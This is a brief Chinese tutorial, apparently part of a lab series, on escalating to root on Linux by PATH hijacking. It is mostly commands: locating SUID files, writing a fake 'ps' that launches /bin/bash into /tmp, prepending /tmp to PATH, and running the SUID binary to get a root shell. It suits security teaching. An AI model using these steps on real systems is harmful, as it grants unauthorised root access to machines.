Linux提权之环境劫持提权(九)
环境劫持需要的两个条件 存在带有suid的文件 suid文件存在系统命令
还是一样的环境 跟第八篇 这里不再多说了
首先我们接着上篇文章 继续
首先我们退出到根目录
然后我们要查找suid文件
find / -perm -u=s -type f 2>/dev/null
输入 ps 或者 script/shell 通常这个文件是存放的系统的ps指令
效果是一样的
这个demo.c就是shell文件的源代码
我们同样可以使用xxd命令来将里面的带有的命令提取出来。
xxd /script/shell | grep ps
然后我们回到tmp临时目录
把这个bin/bash 写入 ps
echo "/bin/bash" > ps
然后把权限设置为最高权限
chmod 777 ps
打印一下我们默认的路径
ehco $PATH
把我们的tmp的路径添加到当前环境路径
export PATH=/tmp:$PATH
然后再次打印输出 发现已经加入了tmp目录
弄好之后再访问 /script目录 执行shell文件,允许的时候首先会采用/tmp目录的ps文件作为命令
cd /script
./shell
然后出现root用户
